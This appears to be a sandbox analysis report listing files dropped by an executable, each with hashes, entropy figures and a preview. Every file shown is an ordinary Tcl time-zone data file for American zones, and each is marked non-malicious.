                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boa_Vista) {.. {-9223372036854775808 -14560 0 LMT}.. {-1767211040 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.705337479465446
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290bJhDm2OHDgoHvcuknov/zEXPKV2kR/uFVEV/KVg:MB86290bLmdHDgCvcukCz8O2Y/uF2/Og
                                                                                                                                                                                                                              MD5:DB019451A7D678C3E7AEE706283861F6
                                                                                                                                                                                                                              SHA1:57E63C5372F50CBD1A7FA32688C1B77ADDCC06EB
                                                                                                                                                                                                                              SHA-256:B6ADC16815DC95E537548CA3572D7F93626A6D1DC390DD4CBABAB5AB855BBA30
                                                                                                                                                                                                                              SHA-512:6C94B2D7EFA856E6BD41FC45B0E8D16A40E61D8B895397CD71230047FAD4793DDB9ABAAC57D2841549F161C9389D7E61D54D38F1BAC6F13ED3DD4C68CDD3272C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bogota) {.. {-9223372036854775808 -17776 0 LMT}.. {-2707671824 -17776 0 BMT}.. {-1739041424 -18000 0 -05}.. {704869200 -14400 1 -05}.. {733896000 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8605
                                                                                                                                                                                                                              Entropy (8bit):3.8563913604109064
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eSwtktXNmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/jXNDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:005D0BF1320030A7E9CDC97D0C8BB44B
                                                                                                                                                                                                                              SHA1:CB236DA840A49B4BCD261114DCA38DADA567B091
                                                                                                                                                                                                                              SHA-256:93AF910CB2AD2203B71C1AD49D56DF4A4A14D07F885AFD4E755271F1372A517C
                                                                                                                                                                                                                              SHA-512:16A5483392741673BEC020EF6EBE963AB0FB12629D662C586C27A1E9A1BE3FEA8DC3D05A0E84917B8166E48CADA45C74DFABFDC897A6BC94D3C5058D31AD5126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boise) {.. {-9223372036854775808 -27889 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-1471788000 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126255600 -25200 0 MST}.. {129114000 -21600 0 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):239
                                                                                                                                                                                                                              Entropy (8bit):4.821972751564724
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MQA+zAHAIgp/MQA+zE5N/290BFzk5h490/MQA+zd:MByMY/MV+zhp/MV+zE5t290rzy490/MW
                                                                                                                                                                                                                              MD5:6700956D5FE96CEC8D34EB49FF805374
                                                                                                                                                                                                                              SHA1:69B9973EF31AE204EFED7485E59CEA99E00815C8
                                                                                                                                                                                                                              SHA-256:DEFC5C9DA2D4D4146145A50D692A6BFF698C3B0A1F19EFD82AD0EE7678F39FCF
                                                                                                                                                                                                                              SHA-512:A80C03A519F00A4270248E885463090A34B3992B3DEBA94DD6AEBCC50736541655461E4AA10856125B8EF9B92CEB697429EE7088DBC6AB4FAE383FDF11521B7A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Buenos_Aires)]} {.. LoadTimeZoneFile America/Argentina/Buenos_Aires..}..set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7739
                                                                                                                                                                                                                              Entropy (8bit):3.8713679494465016
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:zsGaLV9T1sF7Lv/PCewtA8CzSPyDLbrcUia:h5lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:E6AE12CDB55FED492C253E46E2690FE0
                                                                                                                                                                                                                              SHA1:CD3699E50BC1694827E51E4101C713E52FA646C8
                                                                                                                                                                                                                              SHA-256:3E0506A54B562DBC3AA6889DDD39B327FE0B85C63B00F0B39D606921A0936A59
                                                                                                                                                                                                                              SHA-512:BA3D5D5420210E74E74A581C9678224948266828A8FACE06383E41E13475C682F82D288426FB915D618FFE7ED95BD8F1C7E9D59D31CE5B464D5EC1363AB5E340
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cambridge_Bay) {.. {-9223372036854775808 0 0 -00}.. {-1577923200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2918
                                                                                                                                                                                                                              Entropy (8bit):3.6039149423727013
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:591PSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxSs:5VsE3LMuJALTvn1ZdP7ZbvLfeAh+KIic
                                                                                                                                                                                                                              MD5:230A9F7A87BA56C30ACB3B1732F823F3
                                                                                                                                                                                                                              SHA1:8263EA723F2AEA7740C7EC54BE0000A06982D765
                                                                                                                                                                                                                              SHA-256:6D5BD1355016B03EDEA58DF98BEC26281CD372725B2DCB60B4D748D2FB4346C8
                                                                                                                                                                                                                              SHA-512:C357AA33833DBBDC6BC7DD3F23469EADDF08564AF17D7EE935C8AEA5F35B6E3BBDE1E181BC0DBF264051C4BE139261055633D191413DD610B0150AB3CDE161AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Campo_Grande) {.. {-9223372036854775808 -13108 0 LMT}.. {-1767212492 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                              Entropy (8bit):4.034087321254386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5s5edTS/uVV3iVP/uaP/uAyAhbS+V8S+FfS+UvS+MS+FB3S+QS+rcS+kS+RS+dSB:5DziZAmELf0On9uhcinzPPoUlWQW3
                                                                                                                                                                                                                              MD5:7FBCA91F4B7100C4667F24A9AB263109
                                                                                                                                                                                                                              SHA1:163A77FF9EAC49B00B5F838DF4D47F079ECF6A83
                                                                                                                                                                                                                              SHA-256:FD6C370F82E5CFE374637E0E222E72570857AC3F85143BEEEF9C3D0E7A6C0D04
                                                                                                                                                                                                                              SHA-512:124A5D7F58B38F15A90BA48E63D1D38335371D98A2503E691EC6426EB51E87FD61CA05FCA83573DD1DC06DB9E599302C64D226D5DF13B8A62E0A6943318431BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cancun) {.. {-9223372036854775808 -20824 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {828860400 -14400 1 EDT}.. {846396000 -18000 0 EST}.. {860310000 -14400 1 EDT}.. {877845600 -18000 0 EST}.. {891759600 -14400 1 EDT}.. {902041200 -18000 0 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                              Entropy (8bit):4.588048586971241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2909+ETlDm2OHXoHv8HkISlvFVFQVgVJUF/R/OXFxWnVVFQVgVVvR/e:MB86290XmdHXCvydSltvAUeFZ/O/qVva
                                                                                                                                                                                                                              MD5:5DDB49759D58931A06740A14F76B431C
                                                                                                                                                                                                                              SHA1:E9AC99265D42D140E12BB4DAAA24FABAC65E79FA
                                                                                                                                                                                                                              SHA-256:D558C25F165E956E980AA8F554AB3BF24E91B51EADBD2B1065EF6DFDA0E2F984
                                                                                                                                                                                                                              SHA-512:318804ED41F36A3A8746C8CD286116787A768B06CAD6057559D1C7105170DE6EAB807EFA52AA8A0E353491B6F8C47D623D4473C1AEAD20B5C00747E07BB282B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Caracas) {.. {-9223372036854775808 -16064 0 LMT}.. {-2524505536 -16060 0 CMT}.. {-1826739140 -16200 0 -0430}.. {-157750200 -14400 0 -04}.. {1197183600 -16200 0 -0430}.. {1462086000 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):227
                                                                                                                                                                                                                              Entropy (8bit):4.666638841481612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/29094SXAFB5290/MMXAy:MByMY/MYp/MrRt290mh5290/MK
                                                                                                                                                                                                                              MD5:EEB851BE330BCC44A4831763534058B9
                                                                                                                                                                                                                              SHA1:A5FC3E69DDBD3C40D9EB4317BBD5BB6C78751B36
                                                                                                                                                                                                                              SHA-256:37CD6BDAA6C6EEDFAC3288CA1C11F5CBBE8A17E5F2E790E7635A64B867AFBD87
                                                                                                                                                                                                                              SHA-512:7CD0BC822550325EB3198B4AD6CCD38938FA654A03A09C53117560D1FE3FDCD9C892D105F0D7AF44ED52DD7E0475721240D74A10C98619BE9EC4F5410B8FD87D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.832612867310476
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGE91INMXGm2OHEFvpoeoHsdR4FIUPvGXFkUwXvp3VVV:SlSWB9eg/2909qDm2OHEdGeoHm4vOXF6
                                                                                                                                                                                                                              MD5:6052E52C8E5A5F43102C47D895797A1F
                                                                                                                                                                                                                              SHA1:23DBD40AE96C84E44ADCD1AC33E7871D217C17BC
                                                                                                                                                                                                                              SHA-256:873285F3E13CB68DD28EB109ECAD8D260E11A9FF6DF6A4E8E0D4C00B0182695B
                                                                                                                                                                                                                              SHA-512:DDE89C70B6F24AD4F585DC5424A6D029E5C898254C9085C588AE699CED4C8316840FF7C87685D7CFAA2E689F01687985454A0C9E3886342E936C56AB688DF732
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cayenne) {.. {-9223372036854775808 -12560 0 LMT}.. {-1846269040 -14400 0 -04}.. {-71092800 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.774923706273939
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE91mr4IAcGEu5pvn:SlSWB9vsM3y7oDSHAIgpdN/2909Yr49F
                                                                                                                                                                                                                              MD5:AD6E086BEDF05A0BEB66990BD9518BEE
                                                                                                                                                                                                                              SHA1:FA0B7E8D6931E79092A90F7EECBA2293AE886AE3
                                                                                                                                                                                                                              SHA-256:C38C49AE1C3E67BD2118002DCFCC3C0EFB6892FB9B0106908A9282C414D0BF2E
                                                                                                                                                                                                                              SHA-512:A1E40422D15DBCB24A6FE353639A1541FAD7F394D20F8AEB32D4E39667BA264C3E815BAA703B88B90D381540168016A0641CA220BACAF05E80EAA698642B6FFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Cayman) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11372
                                                                                                                                                                                                                              Entropy (8bit):3.814348526052702
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:l6u30Ke1rdJ8SUklvgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:l1EKwdJ8SUkl4aUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:763E23AA7FB20F8D7CB2F0E87FAFD153
                                                                                                                                                                                                                              SHA1:B131A10C1C208BB5E5E178ACD21A679FD0537AC5
                                                                                                                                                                                                                              SHA-256:C7707AF88D650F90839E7258356E39D85228B33B6DBCC5C065C3D8733AE28CEE
                                                                                                                                                                                                                              SHA-512:FE9C5D2EA253338DDFD79CC8ED2F94D6817BD770C0895752EFB1917E2313735C18475D67191C29BCCD53DEFFF35C1BF0CA5D98C92091DDCD1E97CD6302DC73A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chicago) {.. {-9223372036854775808 -21036 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-1563724800 -18000 1 CDT}.. {-1551632400 -21600 0 CST}.. {-1538928000 -18000 1 CDT}.. {-1520182800 -21600 0 CST}.. {-1504454400 -18000 1 CDT}.. {-1491757200 -21600 0 CST}.. {-1473004800 -18000 1 CDT}.. {-1459702800 -21600 0 CST}.. {-1441555200 -18000 1 CDT}.. {-1428253200 -21600 0 CST}.. {-1410105600 -18000 1 CDT}.. {-1396803600 -21600 0 CST}.. {-1378656000 -18000 1 CDT}.. {-1365354000 -21600 0 CST}.. {-1347206400 -18000 1 CDT}.. {-1333904400 -21600 0 CST}.. {-1315152000 -18000 1 CDT}.. {-1301850000 -21600 0 CST}.. {-1283702400 -18000 1 CDT}.. {-1270400400 -21600 0 CST}.. {-1252252800 -18000 1 CDT}.. {-1238950800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2040
                                                                                                                                                                                                                              Entropy (8bit):4.006586050664275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5wE2e49WU0S+VS+TjV/NF01YmM/parZ375+XiBn:5wEvU033FS1YrpaV5+yBn
                                                                                                                                                                                                                              MD5:67738E07092EDB5A9F484ED5CA217EFB
                                                                                                                                                                                                                              SHA1:9E428C67AE4BDACA48D189DF60374F3B6523E120
                                                                                                                                                                                                                              SHA-256:93438D65EA8F95691748FF749219FAFA1940469BC61CED0B7CBF995B417F20B4
                                                                                                                                                                                                                              SHA-512:57C9FE7EAE37504465F33B2AB079ED91700528E330D227E94AE8A06C58DEFA65F1EA1CDF89F835910D92D037DADB45E684A2EA96512B08F83650DD33CCEB8EB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chihuahua) {.. {-9223372036854775808 -25460 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.844590153688034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE9WtEaQXs+IAcGEi:SlSWB9vsM3y7oDSHAIgpdN/2909qEacn
                                                                                                                                                                                                                              MD5:A0BF04CD77026DC1D2749848AB0EE45E
                                                                                                                                                                                                                              SHA1:EA0F1BC11379DF2E421675BC5DE4805CE94B96D6
                                                                                                                                                                                                                              SHA-256:C8CBF5A29CC1D0827390CA6E98B2EFCF90743C6DD0ECA143B300050DD4164041
                                                                                                                                                                                                                              SHA-512:61968B4E42ECC60C801F959D18D13187AD39D9B81FA1A947F6B6862F99D73E3A30849AC4233DB5705D46F5373C42D8748B15BE9B82822971B4F47E601E5766D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Coral_Harbour) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.78887878252354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/29093+90/M7:MByMY/M7p/M16t290c90/M7
                                                                                                                                                                                                                              MD5:C7CCF5CEC7AA60D6063D1C30F4263ADC
                                                                                                                                                                                                                              SHA1:FD8E9AEEEE50656FD3C694CA051895DDC8E5590B
                                                                                                                                                                                                                              SHA-256:28B84710EADEF7AD5E7FA63EF519A9D93996D3BB91DD9018333DE3AC4D8FB8DD
                                                                                                                                                                                                                              SHA-512:6974F8B238977EE5222368C4B79327BB240580819FCA082261D6994781144D81E2E8843B4F1C9D07EFBEE27311C8930BDAC9C0D6D6718F6FB1600D0000576CDE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                                              Entropy (8bit):4.506976345480408
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290lnmdHd5CvZN/Mi3yvI8/uF+wSJz/uF+IA/uF+i/X8/uF+ZDVxNv:5mnedIvZN/e5S+w+S+LS+i0S+pB
                                                                                                                                                                                                                              MD5:0446EF1A6985A62EDFFB9FFAC7F1DE0E
                                                                                                                                                                                                                              SHA1:A43468E120E585E2DCC20205BA1D1E2CCB6C0BC2
                                                                                                                                                                                                                              SHA-256:E3061DC6FA9F869F013351A9FDF420448592D7F959C2B4404093432508146F7E
                                                                                                                                                                                                                              SHA-512:86D41B0C49489572C3EAEDD5466AA92319C721CCEC9437EBB0F2AAD772FB5ED91A2F2061E00448FB48096B0BAAE9A4E1E644F8AF595B76BE05DBC0C801E6D6ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Costa_Rica) {.. {-9223372036854775808 -20173 0 LMT}.. {-2524501427 -20173 0 SJMT}.. {-1545071027 -21600 0 CST}.. {288770400 -18000 1 CDT}.. {297234000 -21600 0 CST}.. {320220000 -18000 1 CDT}.. {328683600 -21600 0 CST}.. {664264800 -18000 1 CDT}.. {678344400 -21600 0 CST}.. {695714400 -18000 1 CDT}.. {700635600 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.8664633847782905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/2IAcGE9mM7x/h4y:SlSWB9vsM3y7OBHAIgpONYyHN/2909vr
                                                                                                                                                                                                                              MD5:0757DD22C0E297CCE8E6678ECA4B39C7
                                                                                                                                                                                                                              SHA1:81B31299F9A35C8BA2EC1F59EC21129FFCDCD52F
                                                                                                                                                                                                                              SHA-256:A01DDB460420C8765CE8EF7A7D031ABD7BDB17CFA548E7C3B8574C388AA21E17
                                                                                                                                                                                                                              SHA-512:F1AFC0F6371A10E4CB74FB2C8985610AEE6C3511861BC09384EDC99D250E9099A1F4430BFC3B0B396C2702BF9991A5A4ECFD53A82C92883460715FA2C1E04579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
